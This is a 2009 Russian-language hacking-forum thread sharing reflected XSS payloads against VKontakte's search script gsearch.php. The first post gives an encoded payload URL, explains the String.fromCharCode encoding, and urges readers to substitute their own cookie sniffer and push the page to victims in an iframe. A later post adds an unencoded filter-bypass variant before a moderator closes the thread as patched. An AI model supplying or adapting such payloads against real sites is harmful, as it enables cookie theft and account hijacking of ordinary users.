ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Пассивная XSS вконтакте
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Пассивная XSS вконтакте
  #1  
Старый 16.06.2009, 11:49
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию Пассивная XSS вконтакте
Сегодня увидел на форуме тему _spamer_, то кто-то ему вапривал какие-то ссылки, посмотрел исходник тех страниц - увидел там в iframe какую-то ссылку на вконтатке. XSS, подумал я. так оно и оказалось. XSS была зашифрована, расшифроваа, я ее разобрал и сейчас представляю Вам.
Сама XSS наодится в скрипте нового поиска - gsearch и выглядит вот так (выводит куки алертом):
Код:
http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,34,62))//
здесь в String.fromCharCode зашифровано следующее:
Код:
<img src="javascript:alert(document.cookie)">
, шифровал я с помощью http://ha.ckers.org/xss.html (внизу строка Decimal Value, заменив &# на запятую (и убрав первую).
Вместо вывода куков вы можете подставить туда свой снифер, зашифроать, а затем впаривать в iframe данную страницу. удачи в использовании, засекаем время, пока не прикроют

На стаью не претендую, просто для новичков расписал все немного подробнее.
 

  #2  
Старый 17.06.2009, 10:06
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Пассивная XSS на ВКонтакте.RU #2
Код:
http://vkontakte.ru/gsearch.php?q=';()())//\';alert(document.cookie)//";<>")//\";<>"<>""!---"?>
Я рулеззз!!! Посмотрим сколько эта проживет...
 

  #3  
Старый 17.06.2009, 10:10
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию
Цитата:
Сообщение от mailbrush  
Пассивная XSS на ВКонтакте.RU #2
Код:
http://vkontakte.ru/gsearch.php?q=';()())//\';alert(document.cookie)//";<>")//\";<>"<>""!---"?>
Я рулеззз!!! Посмотрим сколько эта проживет...
прикроют вместе сразу обе
Кстати, одно и то же, просто у меня закодироанное, у тебя нет
Последний раз редактировалось wildshaman; 17.06.2009 в 10:14..
 

  #4  
Старый 17.06.2009, 10:59
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию
Код:
http://vkontakte.ru/gsearch.php?q=';()())//\';alert(document.cookie)//";<>")//\";<>"<>""!---"?>

http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCha  rCode(60,105,109,103,32,115,114,99,61,34,106,97,11  8,97,115,99,114,105,112,116,58,97,108,101,114,116,  40,100,111,99,117,109,101,110,116,46,99,111,111,10  7,105,101,41,34,62))//
одинаковый скрипт gsearch.php. мейлбруш, ты не нашел новую багу, ты нашел другой обход фильтраций.
__________________
Появляюсь редко. Важные дела в реале.
 

  #5  
Старый 17.06.2009, 11:16
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Ну да, я же не говорил "Бага №2", я сказал: "XSS №2"
 

  #6  
Старый 17.06.2009, 13:28
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Вобщем так , господа, мне надоело чистить эту тему от бессмысленных постов. Видимо слово "вконтакте" действует на некоторых непредсказуемо и привлекает весь народ из болталки сюда. Так вот, обращаю ваше внимание - это раздел "Уязвимости", и ваши комментарии : "спасибо", "круто", "удалите", "её закроют", "её откроют", "ТС Хакер", "ТС не хакер", "Я хакер", "Уберите в приват", "спрячьте от людей" и т.д. Вы можете оставить при себе.

Так-же при себе оставьте вопросы "Оно ещё работает?", "Мне кажется, или уже не работает?" и т.д.

У кого не работает, тому и не надо.

Единственное, что я хочу сдесь увидеть - это "Её закрыли" от компетентного человека, после чего тема будет закрыта.

Ну и конечно обсуждение ПО ТЕМЕ , если вы найдёте что тут можно обсудить.

Флуд будет наказываться.


================================
ADD

ЗАКРЫТО, ИБО ПОФИКСИЛИ
Последний раз редактировалось jokester; 17.06.2009 в 19:55..
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вконтакте Пассивная XSS 20$ Sin3v Разное - Покупка, продажа, обмен 3 05.04.2010 16:09
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ